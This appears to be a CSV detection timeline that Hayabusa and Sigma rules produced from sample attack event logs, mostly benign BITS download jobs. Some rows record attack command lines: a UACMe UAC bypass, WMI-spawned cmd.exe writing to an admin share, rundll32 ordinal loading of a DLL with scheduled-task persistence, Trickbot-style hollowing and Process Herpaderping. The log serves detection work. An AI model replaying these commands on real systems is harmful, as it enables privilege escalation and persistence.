https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : 
User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job 
Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job 
Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning 
Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule 
Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware 
Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe 
shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious 
File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: 
